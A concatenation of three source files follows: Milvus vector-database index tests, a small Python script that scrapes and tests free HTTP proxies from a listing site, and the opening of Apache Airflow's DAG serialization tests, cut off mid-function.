query, query_vecs = gen_query_vectors(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
'''
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
'''
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
'''
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
'''
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
'''
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_collection_not_existed(self, connect):
'''
target: test create index interface when the collection does not exist
method: generate a collection name that has not been created, then create an index on it
expected: create index failed
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
'''
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
'''
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type":"L2", "index_type": "FLAT", "params":{"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
create_target_index(indexs[-1], field_name)
assert index == indexs[-1]
# assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
'''
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
'''
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, metric_type=metric_type, search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
'''
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
'''
target: test create index interface when the collection does not exist
method: generate a collection name that has not been created, then create an index on it
expected: create index failed
'''
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
'''
target: test create index interface when there are no vectors in the collection, and that it does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add entities in it
expected: return code equals to 0
'''
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
for index in indexs:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
# assert index == indexs[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
'''
# result = connect.insert(collection, entities)
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index_collection_not_existed(self, connect):
'''
target: test drop index interface when the collection does not exist
method: generate a collection name that has not been created, then drop an index on it
expected: drop index failed
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index_collection_not_create(self, connect, collection):
'''
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
'''
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and the index is dropped (describe index returns empty)
'''
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
'''
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
'''
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
'''
target: test drop index without connection
method: drop index without an active connection, and check that it fails
expected: raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
'''
target: test drop index interface when the index has not been created
method: create collection and add entities in it, then call drop index without creating an index first
expected: drop index returns successfully (no exception)
'''
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
'''
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_PQ_without_nbits(self, connect, collection):
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
'''
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
'''
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
'''
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, nq, metric_type="JACCARD")
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
logging.getLogger().info(search_param)
res = connect.search(binary_collection, query, search_params=search_param)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
'''
target: test create index interface with invalid metric type
method: add entities into the binary collection, flush, create index with L2 metric type
expected: return create_index failure
'''
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
expected: return code 0, and the index structure
'''
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
expected: return code 0, and the index structure
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and the index is dropped (describe index returns empty)
'''
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection, create partition and add entities in it, create index on collection, call drop collection index
expected: return code 0, and the index is dropped (describe index returns empty)
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
logging.getLogger().info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
logging.getLogger().info("In callback check search result")
logging.getLogger().info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("DROP")
connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
|
get_proxy.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 12 10:10:46 2017
@author: LZR
"""
import requests
from lxml import etree
import threading  # multithreading for processing and control
import time
base_url = 'http://www.xicidaili.com/wt/'
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
# Fetch the web page that lists proxy IPs
def get_html(url):
r = requests.get(url, headers=headers)
r.raise_for_status()
html = r.text
return html
# Parse the page, extract the proxy IP addresses and ports, and return them as a list
def html_parser(html):
result = []
html = etree.HTML(html)
ip_info = html.xpath('//table[@id="ip_list"]/tr')
del ip_info[0]
for ip in ip_info:
res = 'http://' + ip.xpath('td[2]/text()')[0] + ':' + ip.xpath('td[3]/text()')[0]
result.append(res)
return result
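# Illustrative sketch (not part of the original file) of the value returned by
# html_parser above, assuming the xicidaili table keeps the IP in column 2 and
# the port in column 3:
#   html_parser(html)  # -> ['http://1.2.3.4:8080', 'http://5.6.7.8:3128', ...]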
# Test a proxy and, if it is usable, save it to the txt file
def get_use_proxy(ip):
proxies = {'http': ip}
try:
print('Testing proxy IP: ' + ip + '\n')
r = requests.get('http://www.baidu.com', proxies=proxies, timeout=3)
if r.status_code == 200:
print('Proxy IP ' + ip + ' is valid and usable' + '\n')
save_good_ip(ip)  # write proxy IPs that passed the test to a txt file
except:
pass
# Start multiple threads to test the availability of the IP addresses
def start_test_ip(results):
for ip in results:
th=threading.Thread(target=get_use_proxy,args=(ip,))
th.start()  # start the thread
# Write the scraped proxy IPs to a txt file
def save_all_ip(all_ip):
with open('all_ip.txt', 'w') as file:
for ip in all_ip:
file.write(ip + '\n')
print('All proxy IPs have been written!')
# Clear the usable IPs left over from the previous crawl first
with open('good_ip.txt', 'w') as f:
f.write('')
# Append usable proxy IPs to the txt file
def save_good_ip(ip):
with open('good_ip.txt', 'a') as file:
file.write(ip + '\n')
if __name__ == '__main__':
results = []
page = 6  # number of pages to crawl
for i in range(0, page):
url = base_url + str(i+1)
html = get_html(url)
result = html_parser(html)
results.extend(result)
save_all_ip(results)
start_test_ip(results)
time.sleep(2)
print("可用ip存储完毕!")
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
from dateutil.relativedelta import FR, relativedelta
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"bash_command": "echo {{ task.task_id }}",
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_dag_read",
"can_dag_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
